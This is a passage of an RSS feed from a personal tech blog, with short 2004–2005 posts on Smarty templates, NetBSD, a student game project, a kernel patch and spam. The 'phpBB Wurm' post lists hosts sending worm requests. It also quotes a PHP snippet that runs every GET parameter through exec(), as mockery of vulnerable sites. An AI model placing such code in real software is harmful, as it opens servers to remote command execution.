  10167. O Bride of the Netherworld&quot;
  10168. </p>
  10169.  
  10170. <p>
  10171. <i>Sailing on the distant seas...</i>
  10172. </p>
  10173.  
  10174. <p>
  10175. Join my soul the Hunter in the sky
  10176. </p>
  10177. ]]></content:encoded>
  10178.  </item>
  10179.  
  10180.  <item>
  10181.    <title>Smarty</title>
  10182.    <link>https://blog.x-way.org/Coding/2005/01/06/Smarty.html</link>
  10183.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324053</guid>
  10184.    <dc:creator>Andreas Jaggi</dc:creator>
  10185.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10186.    <pubDate>Thu, 06 Jan 2005 00:28:21 +0000</pubDate>
  10187.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  10188.    <description><![CDATA[<p>Angeregt durch <a href="https://web.archive.org/web/20050210182704/http://weblog.bsd-network.org/" title="mindtrap::weblog (archive.org)">Gordons</a> Smarty <a href="https://web.archive.org/web/20050405032950/http://weblog.bsd-network.org/archives/2005/01/03/smarty-templates/" title="Smarty Templates (archive.org)">Posting</a> gibts es hier nun auch einen Eintrag über Template Systeme und ein paar interessante Links.</p>
  10189. <p>Angefangen hat das mit den Templates, als ich vor 2 Jahren die <a href="https://web.archive.org/web/20060219141244/http://f.waterwave.ch/" title="Willkommen auf der Website der 1F (archive.org)">Website</a> für meine Klasse des Gymnasiums <a href="http://www.waterwave.ch/weblog/detail.php?label=fwaterwavech" title="x-log: f.waterwave.ch">gemacht habe</a>. Damals benutze ich die <a href="https://web.archive.org/web/20050123002216/http://pet.andreas-demmer.de/" title="P.E.T.: PHP Processor Engine for Templates (archive.org)">P.E.T.</a> Template-Engine von <a href="https://web.archive.org/web/20050120025716/http://www.andreas-demmer.de/cms/" title="Andreas Demmer (archive.org)">Andreas Demmer</a>.<br>
  10190. In der damals top-aktuellen Version 1.5 musste man Template-Tags in einer etwas unhandlichen Form benutzen: &lt;!-- {tag} --&gt;</p>
  10191.  
  10192. <p>Als ich vor einem Jahr mein Weblog komplett neu programmierte,
  10193. wollte ich auch ein Template-System benutzen, aber ohne so umständliche
  10194. Tags.<br>
  10195. Inspiriert von <a href="http://www.massassi.com/php/articles/template_engines/" title="Brian Lozier - Template Engines">diesem Artikel</a>
  10196. habe ich eine PHP-Klasse programmiert, welche eigentlich nichts anderes
  10197. macht, als ein paar Variablen zu speichern und eine Template-Datei zu
  10198. inkludieren. Die Template-Tags sind auf &lt;?=$tag;?&gt; geschrumpft
  10199. und man kann die ganze Vielfalt von PHP nutzen ohne die Template-Datei
  10200. speziell zu parsen.</p>
  10201.  
  10202. <p>
  10203. Im letzten Sommer habe ich einen Ferienjob gesucht und mich auf eine Ausschreibung des <a href="http://kis.epfl.ch/" title="Knowledge and Information Services">KIS</a> gemeldet. Als Anforderung wurden unter anderem <a href="https://www.smarty.net/" title="Smart : Template Engine">Smarty</a> Kenntnisse genannt, und so habe ich mir einen Abend Zeit genommen und mich in Smarty hineingearbeitet.</p>
  10204.  
  10205. <p>Früher habe ich mich etwas vor Smarty gedrückt, weil es mir etwas schwerfällig schien mit Template-Kompilierung, Caching etc.<br>
  10206. Doch
  10207. seit ich mich intensiv damit beschäftige und auch entdecken durfte,
  10208. dass die kompilierten Templates eigentlich genau meinem
  10209. &quot;include&quot;-Template System entsprechen, habe ich meine Meinung geändert.<br>
  10210. Nun setzte ich Smarty auch bei eigenen Projekten ein.</p>
  10211.  
  10212. <p>Hier noch ein paar gesammelte Links zu Smarty:</p>
  10213.  
  10214. <ul>
  10215. <li class="gone"><a href="#" title="Smarty i18n Plugin">Smarty i18n Plugin</a> &ndash; Internationalisierung für Smarty</li>
  10216. <li><a href="http://www.phpinsider.com/php/code/SmartyValidate/" title="SmartyValidate">SmartyValidate</a> &ndash; Form Validation mit Smarty</li>
  10217. <li><a href="https://web.archive.org/web/20050509014022/http://paland.net/blog/index.php/2004/11/24/347-phpmysql-anwendungen-ein-pladoyer-fur-smarty" title="PHP/MySQL-Anwendungen: Ein Plädoyer für Smarty (archive.org)">Ein Plädoyer für Smarty</a></li>
  10218. <li class="gone"><a href="#" title="Smarty - BeWiki">BeWiki &ndash; Smarty</a> &ndash; Linksammlung</li>
  10219. <li><a href="https://web.archive.org/web/20050120093641/http://smarty.incutio.com/?page=SmartyPlugins" title="SmartyPlugins (archive.org)">Smarty Plugin Verzeichnis</a></li>
  10220. </ul>
  10221.  
  10222. ]]></description>
  10223.    <content:encoded><![CDATA[<p>Angeregt durch <a href="https://web.archive.org/web/20050210182704/http://weblog.bsd-network.org/" title="mindtrap::weblog (archive.org)">Gordons</a> Smarty <a href="https://web.archive.org/web/20050405032950/http://weblog.bsd-network.org/archives/2005/01/03/smarty-templates/" title="Smarty Templates (archive.org)">Posting</a> gibts es hier nun auch einen Eintrag über Template Systeme und ein paar interessante Links.</p>
  10224. <p>Angefangen hat das mit den Templates, als ich vor 2 Jahren die <a href="https://web.archive.org/web/20060219141244/http://f.waterwave.ch/" title="Willkommen auf der Website der 1F (archive.org)">Website</a> für meine Klasse des Gymnasiums <a href="http://www.waterwave.ch/weblog/detail.php?label=fwaterwavech" title="x-log: f.waterwave.ch">gemacht habe</a>. Damals benutze ich die <a href="https://web.archive.org/web/20050123002216/http://pet.andreas-demmer.de/" title="P.E.T.: PHP Processor Engine for Templates (archive.org)">P.E.T.</a> Template-Engine von <a href="https://web.archive.org/web/20050120025716/http://www.andreas-demmer.de/cms/" title="Andreas Demmer (archive.org)">Andreas Demmer</a>.<br>
  10225. In der damals top-aktuellen Version 1.5 musste man Template-Tags in einer etwas unhandlichen Form benutzen: &lt;!-- {tag} --&gt;</p>
  10226.  
  10227. <p>Als ich vor einem Jahr mein Weblog komplett neu programmierte,
  10228. wollte ich auch ein Template-System benutzen, aber ohne so umständliche
  10229. Tags.<br>
  10230. Inspiriert von <a href="http://www.massassi.com/php/articles/template_engines/" title="Brian Lozier - Template Engines">diesem Artikel</a>
  10231. habe ich eine PHP-Klasse programmiert, welche eigentlich nichts anderes
  10232. macht, als ein paar Variablen zu speichern und eine Template-Datei zu
  10233. inkludieren. Die Template-Tags sind auf &lt;?=$tag;?&gt; geschrumpft
  10234. und man kann die ganze Vielfalt von PHP nutzen ohne die Template-Datei
  10235. speziell zu parsen.</p>
  10236.  
  10237. <p>
  10238. Im letzten Sommer habe ich einen Ferienjob gesucht und mich auf eine Ausschreibung des <a href="http://kis.epfl.ch/" title="Knowledge and Information Services">KIS</a> gemeldet. Als Anforderung wurden unter anderem <a href="https://www.smarty.net/" title="Smart : Template Engine">Smarty</a> Kenntnisse genannt, und so habe ich mir einen Abend Zeit genommen und mich in Smarty hineingearbeitet.</p>
  10239.  
  10240. <p>Früher habe ich mich etwas vor Smarty gedrückt, weil es mir etwas schwerfällig schien mit Template-Kompilierung, Caching etc.<br>
  10241. Doch
  10242. seit ich mich intensiv damit beschäftige und auch entdecken durfte,
  10243. dass die kompilierten Templates eigentlich genau meinem
  10244. &quot;include&quot;-Template System entsprechen, habe ich meine Meinung geändert.<br>
  10245. Nun setzte ich Smarty auch bei eigenen Projekten ein.</p>
  10246.  
  10247. <p>Hier noch ein paar gesammelte Links zu Smarty:</p>
  10248.  
  10249. <ul>
  10250. <li class="gone"><a href="#" title="Smarty i18n Plugin">Smarty i18n Plugin</a> &ndash; Internationalisierung für Smarty</li>
  10251. <li><a href="http://www.phpinsider.com/php/code/SmartyValidate/" title="SmartyValidate">SmartyValidate</a> &ndash; Form Validation mit Smarty</li>
  10252. <li><a href="https://web.archive.org/web/20050509014022/http://paland.net/blog/index.php/2004/11/24/347-phpmysql-anwendungen-ein-pladoyer-fur-smarty" title="PHP/MySQL-Anwendungen: Ein Plädoyer für Smarty (archive.org)">Ein Plädoyer für Smarty</a></li>
  10253. <li class="gone"><a href="#" title="Smarty - BeWiki">BeWiki &ndash; Smarty</a> &ndash; Linksammlung</li>
  10254. <li><a href="https://web.archive.org/web/20050120093641/http://smarty.incutio.com/?page=SmartyPlugins" title="SmartyPlugins (archive.org)">Smarty Plugin Verzeichnis</a></li>
  10255. </ul>
  10256.  
  10257. ]]></content:encoded>
  10258.  </item>
  10259.  
  10260.  <item>
  10261.    <title>English</title>
  10262.    <link>https://blog.x-way.org/Misc/2005/01/05/English.html</link>
  10263.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324052</guid>
  10264.    <dc:creator>Andreas Jaggi</dc:creator>
  10265.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10266.    <pubDate>Wed, 05 Jan 2005 17:21:35 +0000</pubDate>
  10267.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  10268.    <description><![CDATA[<p>Motivated by Joel&#8217;s <a href="http://www.joelonsoftware.com/articles/CollegeAdvice.html" title="Joel on Software -  Advice for Computer Science College Students">Advice for Computer Science College Students</a> i beginn now to blog also in english. The target is to improve my written english skills.<br>
  10269. I hope that this experiment doesn&#8217;t result like the french one, which
  10270. is dying poorly since i daily speak french and don&#8217;t write in it
  10271. anymore.</p>
  10272. ]]></description>
  10273.    <content:encoded><![CDATA[<p>Motivated by Joel&#8217;s <a href="http://www.joelonsoftware.com/articles/CollegeAdvice.html" title="Joel on Software -  Advice for Computer Science College Students">Advice for Computer Science College Students</a> i beginn now to blog also in english. The target is to improve my written english skills.<br>
  10274. I hope that this experiment doesn&#8217;t result like the french one, which
  10275. is dying poorly since i daily speak french and don&#8217;t write in it
  10276. anymore.</p>
  10277. ]]></content:encoded>
  10278.  </item>
  10279.  
  10280.  <item>
  10281.    <title>phpBB Wurm</title>
  10282.    <link>https://blog.x-way.org/Coding/2004/12/26/phpBB-Wurm.html</link>
  10283.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324051</guid>
  10284.    <dc:creator>Andreas Jaggi</dc:creator>
  10285.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10286.    <pubDate>Sun, 26 Dec 2004 01:43:52 +0000</pubDate>
  10287.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  10288.    <description><![CDATA[<p>Seit heute Abend bekomme ich von folgenden Hosts etwas <a href="https://web.archive.org/web/20041231074726/https://www.heise.de/security/news/meldung/54623" title=" Wurm attackiert PHP-Skripte">'spezielle'</a> HTTP Anfragen, welche hier zum Glück wirkungslos sind:<br>
  10289. </p>
  10290. <ul>
  10291.  <li>mail.shanghaiguide.com.cn</li>
  10292.  <li>aster.propagation.net</li>
  10293.  <li>cp02.virtuabyte.com</li>
  10294.  <li>b3.ovh.net</li>
  10295.  <li>merlin2.provinz.bz.it</li>
  10296.  <li>www.silverchair.nu</li>
  10297.  <li>chippy.takeoverhosting.com</li>
  10298.  <li>web1.o1.com</li>
  10299.  <li>cpanel5.fuitadnet.com</li>
  10300.  <li>cgi03.plus.net</li>
  10301.  <li>18.67-18-148.reverse.theplanet.com</li>
  10302.  <li>66.199.234.42</li>
  10303.  <li>sproggit.fluent.ltd.uk</li>
  10304.  <li>server1.progressiveinsite.com</li>
  10305.  <li>pingouin.ie2.u-psud.fr</li>
  10306.  <li>194.42.45.5</li>
  10307.  <li>...</li>
  10308. </ul>
  10309. <p>Dazu <a href="#" title="Zur Weihnacht ist Hochbetrieb" class="gone">sunflyer.ch</a>:<br>
  10310. </p>
  10311. <blockquote cite="http://sunflyer.ch/2004/12/25/zur-weihnacht-ist-hochbetrieb.php">
  10312. <p>Beeindruckend ist die Anzahl von Opfern, die irgendwie sowas in ihren Sourcen haben müssen.</p><pre>&lt;?php<br>foreach ($_GET as $_get) {<br>    exec ($_get);<br>}<br>?&gt;
  10313. </pre></blockquote>
  10314. ]]></description>
  10315.    <content:encoded><![CDATA[<p>Seit heute Abend bekomme ich von folgenden Hosts etwas <a href="https://web.archive.org/web/20041231074726/https://www.heise.de/security/news/meldung/54623" title=" Wurm attackiert PHP-Skripte">'spezielle'</a> HTTP Anfragen, welche hier zum Glück wirkungslos sind:<br>
  10316. </p>
  10317. <ul>
  10318.  <li>mail.shanghaiguide.com.cn</li>
  10319.  <li>aster.propagation.net</li>
  10320.  <li>cp02.virtuabyte.com</li>
  10321.  <li>b3.ovh.net</li>
  10322.  <li>merlin2.provinz.bz.it</li>
  10323.  <li>www.silverchair.nu</li>
  10324.  <li>chippy.takeoverhosting.com</li>
  10325.  <li>web1.o1.com</li>
  10326.  <li>cpanel5.fuitadnet.com</li>
  10327.  <li>cgi03.plus.net</li>
  10328.  <li>18.67-18-148.reverse.theplanet.com</li>
  10329.  <li>66.199.234.42</li>
  10330.  <li>sproggit.fluent.ltd.uk</li>
  10331.  <li>server1.progressiveinsite.com</li>
  10332.  <li>pingouin.ie2.u-psud.fr</li>
  10333.  <li>194.42.45.5</li>
  10334.  <li>...</li>
  10335. </ul>
  10336. <p>Dazu <a href="#" title="Zur Weihnacht ist Hochbetrieb" class="gone">sunflyer.ch</a>:<br>
  10337. </p>
  10338. <blockquote cite="http://sunflyer.ch/2004/12/25/zur-weihnacht-ist-hochbetrieb.php">
  10339. <p>Beeindruckend ist die Anzahl von Opfern, die irgendwie sowas in ihren Sourcen haben müssen.</p><pre>&lt;?php<br>foreach ($_GET as $_get) {<br>    exec ($_get);<br>}<br>?&gt;
  10340. </pre></blockquote>
  10341. ]]></content:encoded>
  10342.  </item>
  10343.  
  10344.  <item>
  10345.    <title>Weihnachten</title>
  10346.    <link>https://blog.x-way.org/Misc/2004/12/24/Weihnachten.html</link>
  10347.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324050</guid>
  10348.    <dc:creator>Andreas Jaggi</dc:creator>
  10349.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10350.    <pubDate>Fri, 24 Dec 2004 17:59:46 +0000</pubDate>
  10351.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  10352.    <description><![CDATA[Frohe Festtage!
  10353. ]]></description>
  10354.    <content:encoded><![CDATA[Frohe Festtage!
  10355. ]]></content:encoded>
  10356.  </item>
  10357.  
  10358.  <item>
  10359.    <title>Noël</title>
  10360.    <link>https://blog.x-way.org/Misc/2004/12/24/Noel.html</link>
  10361.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324049</guid>
  10362.    <dc:creator>Andreas Jaggi</dc:creator>
  10363.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10364.    <pubDate>Fri, 24 Dec 2004 17:58:11 +0000</pubDate>
  10365.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  10366.    <description><![CDATA[Joyeuses f&#234;tes!
  10367.  
  10368. ]]></description>
  10369.    <content:encoded><![CDATA[Joyeuses f&#234;tes!
  10370.  
  10371. ]]></content:encoded>
  10372.  </item>
  10373.  
  10374.  <item>
  10375.    <title>Gmail</title>
  10376.    <link>https://blog.x-way.org/Misc/2004/09/16/Gmail.html</link>
  10377.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324048</guid>
  10378.    <dc:creator>Andreas Jaggi</dc:creator>
  10379.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10380.    <pubDate>Thu, 16 Sep 2004 21:14:23 +0000</pubDate>
  10381.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  10382.    <description><![CDATA[<p>Seit neustem habe auch ich so einen <a href="https://gmail.google.com/" lang="en" title="Welcome to Gmail">Gmail</a>-Account und habe nun einige Einladungen zu verschenken.<br>Wer Interesse daran hat, soll sich melden.</p>
  10383. ]]></description>
  10384.    <content:encoded><![CDATA[<p>Seit neustem habe auch ich so einen <a href="https://gmail.google.com/" lang="en" title="Welcome to Gmail">Gmail</a>-Account und habe nun einige Einladungen zu verschenken.<br>Wer Interesse daran hat, soll sich melden.</p>
  10385. ]]></content:encoded>
  10386.  </item>
  10387.  
  10388.  <item>
  10389.    <title>NetBSD</title>
  10390.    <link>https://blog.x-way.org/NetBSD/2004/08/23/NetBSD.html</link>
  10391.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324047</guid>
  10392.    <dc:creator>Andreas Jaggi</dc:creator>
  10393.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10394.    <pubDate>Mon, 23 Aug 2004 23:20:28 +0000</pubDate>
  10395.    <category domain="https://blog.x-way.org/NetBSD">NetBSD</category>
  10396.    <description><![CDATA[<p><a href="http://hcpnet.free.fr/applebsd.html" title="Mach and Darwin binary compatibility for NetBSD/powerpc and NetBSD/i386" lang="en">Hier</a> wird versucht Mac OS X Anwendungen unter <a href="http://www.netbsd.org/" title="The NetBSD Project">NetBSD</a> zum laufen zu bringen.</p><p>Da ich auf meinem PowerBook gerne einige kommerzielle Programme benutzen möchte, aber dennoch auf die Programmvielfalt eines "freien" Unixsystems nicht verzichten möchte, habe ich vor mich in Zukunft etwas mit <a href="http://www.netbsd.org/" title="The NetBSD Project">NetBSD</a> zu beschäftigen.</p><p>Der erste Schritt dazu ist schon gemacht: Seit gestern Abend läuft auf meinem alten Testrechner <a href="http://www.netbsd.org/" title="The NetBSD Project">NetBSD</a> 1.6.2 :-)</p>
  10397. ]]></description>
  10398.    <content:encoded><![CDATA[<p><a href="http://hcpnet.free.fr/applebsd.html" title="Mach and Darwin binary compatibility for NetBSD/powerpc and NetBSD/i386" lang="en">Hier</a> wird versucht Mac OS X Anwendungen unter <a href="http://www.netbsd.org/" title="The NetBSD Project">NetBSD</a> zum laufen zu bringen.</p><p>Da ich auf meinem PowerBook gerne einige kommerzielle Programme benutzen möchte, aber dennoch auf die Programmvielfalt eines "freien" Unixsystems nicht verzichten möchte, habe ich vor mich in Zukunft etwas mit <a href="http://www.netbsd.org/" title="The NetBSD Project">NetBSD</a> zu beschäftigen.</p><p>Der erste Schritt dazu ist schon gemacht: Seit gestern Abend läuft auf meinem alten Testrechner <a href="http://www.netbsd.org/" title="The NetBSD Project">NetBSD</a> 1.6.2 :-)</p>
  10399. ]]></content:encoded>
  10400.  </item>
  10401.  
  10402.  <item>
  10403.    <title>Examens Propédeutique I</title>
  10404.    <link>https://blog.x-way.org/School/2004/07/31/Examens_Propedeutique_I.html</link>
  10405.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324046</guid>
  10406.    <dc:creator>Andreas Jaggi</dc:creator>
  10407.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10408.    <pubDate>Sat, 31 Jul 2004 13:38:40 +0000</pubDate>
  10409.    <category domain="https://blog.x-way.org/School">School</category>
  10410.    <description><![CDATA[<q>Examen réussi sur décision de la Conférence des notes</q> :-)
  10411. ]]></description>
  10412.    <content:encoded><![CDATA[<q>Examen réussi sur décision de la Conférence des notes</q> :-)
  10413. ]]></content:encoded>
  10414.  </item>
  10415.  
  10416.  <item>
  10417.    <title>Anschauen!</title>
  10418.    <link>https://blog.x-way.org/Webdesign/2004/07/25/Anschauen.html</link>
  10419.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324045</guid>
  10420.    <dc:creator>Andreas Jaggi</dc:creator>
  10421.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10422.    <pubDate>Sun, 25 Jul 2004 00:25:23 +0000</pubDate>
  10423.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  10424.    <description><![CDATA[<a href="https://web.archive.org/web/20040904092500/http://piepmatzel.de/" title="collecting best practice webdesign resources (archive.org)">collecting best practice webdesign resources</a>
  10425. ]]></description>
  10426.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20040904092500/http://piepmatzel.de/" title="collecting best practice webdesign resources (archive.org)">collecting best practice webdesign resources</a>
  10427. ]]></content:encoded>
  10428.  </item>
  10429.  
  10430.  <item>
  10431.    <title>Quicklinks Webdesign</title>
  10432.    <link>https://blog.x-way.org/Webdesign/2004/07/06/Quicklinks_Webdesign.html</link>
  10433.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324044</guid>
  10434.    <dc:creator>Andreas Jaggi</dc:creator>
  10435.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10436.    <pubDate>Tue, 06 Jul 2004 19:15:50 +0000</pubDate>
  10437.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  10438.    <description><![CDATA[<ul><li><a href="http://www.virtuelvis.com/gallery/css/rounded/" title="Rounded Corners in CSS">Rounded Corners in CSS</a> via <a href="http://del.icio.us/" title="social bookmarks">del.icio.us</a></li><li><a href="http://www.simplebits.com/bits/photo_zoom.html" title="CSS Photo Zoom">CSS Photo Zoom</a>  via <a href="http://linkdump.de/" title="LinkDump">LinkDump</a></li><li><a href="http://www.sitepoint.com/article/flash-interface-design" title="Flash Interface Design Made Simple">Flash Interface Design</a> via <a href="http://www.metamorphine.de/" title="metamorphine">metamorphine</a></li></ul>
  10439. ]]></description>
  10440.    <content:encoded><![CDATA[<ul><li><a href="http://www.virtuelvis.com/gallery/css/rounded/" title="Rounded Corners in CSS">Rounded Corners in CSS</a> via <a href="http://del.icio.us/" title="social bookmarks">del.icio.us</a></li><li><a href="http://www.simplebits.com/bits/photo_zoom.html" title="CSS Photo Zoom">CSS Photo Zoom</a>  via <a href="http://linkdump.de/" title="LinkDump">LinkDump</a></li><li><a href="http://www.sitepoint.com/article/flash-interface-design" title="Flash Interface Design Made Simple">Flash Interface Design</a> via <a href="http://www.metamorphine.de/" title="metamorphine">metamorphine</a></li></ul>
  10441. ]]></content:encoded>
  10442.  </item>
  10443.  
  10444.  <item>
  10445.    <title>Bomberman 2004</title>
  10446.    <link>https://blog.x-way.org/Coding/2004/07/03/Bomberman_2004.html</link>
  10447.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324042</guid>
  10448.    <dc:creator>Andreas Jaggi</dc:creator>
  10449.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10450.    <pubDate>Sat, 03 Jul 2004 22:20:51 +0000</pubDate>
  10451.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  10452.    <description><![CDATA[<p>Wie <a href="http://www.waterwave.ch/weblog/detail.php?label=CVS" title="Projekt mit CVS">schon angekündigt</a> haben wir im Programmieren ein Projekt gemacht, welches nun letzten Sonntag fertig wurde. Herausgekommen ist ein kleines Bomberman-Spiel, welches man <a href="https://blog.x-way.org/stuff/bomberman.zip" title="bomberman.zip">hier</a>  herunterladen kann (für Interessierte gibts <a href="https://blog.x-way.org/stuff/bomberman-src.tar.gz" title="Bomberman Sourcen">hier</a> noch die Sourcen).</p><p>Das Spiel hat ziemlich viele Bugs und Fehler, welche vor allem daher kommen, dass wir die ganze Spiel-Engine von den Assistenten geliefert bekammen. Die Engine ist jedoch ohne ein intelligentes Design, mit lauter Fehlern und Exceptions und in einem schrecklichen Code-Stil gemacht worden. So braucht beispielsweise der Konstruktor der Klasse, welche die Netzwerk-Sockets erstellt, eine Referenz auf ein GUI-Element um allfällige Netzwerkfehler direkt dorthinein zu schreiben!</p><p>Und auch die langen Wartezeiten beim starten von Spielen sind nur da, weil die Engine mit vielen NullPointer-Exceptions abstürzt wenn ein Spiel in Echtzeit gestartet wird!</p><p>Programmiert haben wir eigentlich "nur" die künstliche Intelligenz, den Leveleditor und das Fenster um die verschiedenen Spieltypen auszuwählen (Ursprünglich musste der Benutzer mittels Kommandozeile die einzelnen Clients und Server starten und miteinander verbinden!).</p><p>Wer keinen Fernseher hat, kann im Simulationsmodus schauen wie die künstliche Intelligenz gegen sich selbst spielt. Das kann durchaus eine abendfüllende Spielzeit annehmen!</p>
  10453. ]]></description>
  10454.    <content:encoded><![CDATA[<p>Wie <a href="http://www.waterwave.ch/weblog/detail.php?label=CVS" title="Projekt mit CVS">schon angekündigt</a> haben wir im Programmieren ein Projekt gemacht, welches nun letzten Sonntag fertig wurde. Herausgekommen ist ein kleines Bomberman-Spiel, welches man <a href="https://blog.x-way.org/stuff/bomberman.zip" title="bomberman.zip">hier</a>  herunterladen kann (für Interessierte gibts <a href="https://blog.x-way.org/stuff/bomberman-src.tar.gz" title="Bomberman Sourcen">hier</a> noch die Sourcen).</p><p>Das Spiel hat ziemlich viele Bugs und Fehler, welche vor allem daher kommen, dass wir die ganze Spiel-Engine von den Assistenten geliefert bekammen. Die Engine ist jedoch ohne ein intelligentes Design, mit lauter Fehlern und Exceptions und in einem schrecklichen Code-Stil gemacht worden. So braucht beispielsweise der Konstruktor der Klasse, welche die Netzwerk-Sockets erstellt, eine Referenz auf ein GUI-Element um allfällige Netzwerkfehler direkt dorthinein zu schreiben!</p><p>Und auch die langen Wartezeiten beim starten von Spielen sind nur da, weil die Engine mit vielen NullPointer-Exceptions abstürzt wenn ein Spiel in Echtzeit gestartet wird!</p><p>Programmiert haben wir eigentlich "nur" die künstliche Intelligenz, den Leveleditor und das Fenster um die verschiedenen Spieltypen auszuwählen (Ursprünglich musste der Benutzer mittels Kommandozeile die einzelnen Clients und Server starten und miteinander verbinden!).</p><p>Wer keinen Fernseher hat, kann im Simulationsmodus schauen wie die künstliche Intelligenz gegen sich selbst spielt. Das kann durchaus eine abendfüllende Spielzeit annehmen!</p>
  10455. ]]></content:encoded>
  10456.  </item>
  10457.  
  10458.  <item>
  10459.    <title>Analysis überlebt!</title>
  10460.    <link>https://blog.x-way.org/School/2004/07/03/Analysis_ueberlebt.html</link>
  10461.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324043</guid>
  10462.    <dc:creator>Andreas Jaggi</dc:creator>
  10463.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10464.    <pubDate>Sat, 03 Jul 2004 22:10:05 +0000</pubDate>
  10465.    <category domain="https://blog.x-way.org/School">School</category>
  10466.    <description><![CDATA[<p>Hier hat sich in den letzten paar Wochen nicht sehr viel geändert, da ich Prüfungen hatte und noch habe.</p><p>Jedoch ist das Schlimmste seit heute Morgen vorbei :-)</p>
  10467. ]]></description>
  10468.    <content:encoded><![CDATA[<p>Hier hat sich in den letzten paar Wochen nicht sehr viel geändert, da ich Prüfungen hatte und noch habe.</p><p>Jedoch ist das Schlimmste seit heute Morgen vorbei :-)</p>
  10469. ]]></content:encoded>
  10470.  </item>
  10471.  
  10472.  <item>
  10473.    <title>PowerBook Buttons</title>
  10474.    <link>https://blog.x-way.org/Mac/2004/06/17/PowerBook_Buttons.html</link>
  10475.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324041</guid>
  10476.    <dc:creator>Andreas Jaggi</dc:creator>
  10477.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10478.    <pubDate>Thu, 17 Jun 2004 14:12:01 +0000</pubDate>
  10479.    <category domain="https://blog.x-way.org/Mac">Mac</category>
  10480.    <description><![CDATA[<p>Nachdem ich <a href="http://www.linuxchix.org/content/courses/kernel_hacking/" title="LinuxChix Kernel Hacking Lessons">diese Artikel</a> gelesen hatte, kam ich plötzlich auf die Idee die bisher nicht funktionerenden Spezialbuttons meines PowerBooks zum laufen zu kriegen.</p><p>Dies stellte sich unerwarteterweise als gar nicht so schwer heraus, und nun gibts <a href="https://blog.x-way.org/stuff/linux-2.6.3-alubuttons.patch">hier</a> einen Patch für den 2.6.3 Kernel :-)</p><p>*kernelhacking*</p>
  10481. ]]></description>
  10482.    <content:encoded><![CDATA[<p>Nachdem ich <a href="http://www.linuxchix.org/content/courses/kernel_hacking/" title="LinuxChix Kernel Hacking Lessons">diese Artikel</a> gelesen hatte, kam ich plötzlich auf die Idee die bisher nicht funktionerenden Spezialbuttons meines PowerBooks zum laufen zu kriegen.</p><p>Dies stellte sich unerwarteterweise als gar nicht so schwer heraus, und nun gibts <a href="https://blog.x-way.org/stuff/linux-2.6.3-alubuttons.patch">hier</a> einen Patch für den 2.6.3 Kernel :-)</p><p>*kernelhacking*</p>
  10483. ]]></content:encoded>
  10484.  </item>
  10485.  
  10486.  <item>
  10487.    <title>Alle 20 Minuten Spam</title>
  10488.    <link>https://blog.x-way.org/Misc/2004/06/12/Alle_20_Minuten_Spam.html</link>
  10489.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324040</guid>
  10490.    <dc:creator>Andreas Jaggi</dc:creator>
  10491.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10492.    <pubDate>Sat, 12 Jun 2004 23:32:56 +0000</pubDate>
  10493.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  10494.    <description><![CDATA[<p>Wie ich vorhin gerade bemerkt habe, habe ich in den letzten 12 Tagen 800 Spam-Mails erhalten. Glücklicherweise hat mein Spam-Filter 780 davon erkannt :-)</p>
  10495. ]]></description>
  10496.    <content:encoded><![CDATA[<p>Wie ich vorhin gerade bemerkt habe, habe ich in den letzten 12 Tagen 800 Spam-Mails erhalten. Glücklicherweise hat mein Spam-Filter 780 davon erkannt :-)</p>
  10497. ]]></content:encoded>
  10498.  </item>
  10499.  
  10500.  <item>
  10501.    <title>phpPatterns()</title>
  10502.    <link>https://blog.x-way.org/Coding/2004/06/12/phpPatterns.html</link>
  10503.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324039</guid>
  10504.    <dc:creator>Andreas Jaggi</dc:creator>
  10505.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  10506.    <pubDate>Sat, 12 Jun 2004 21:30:02 +0000</pubDate>
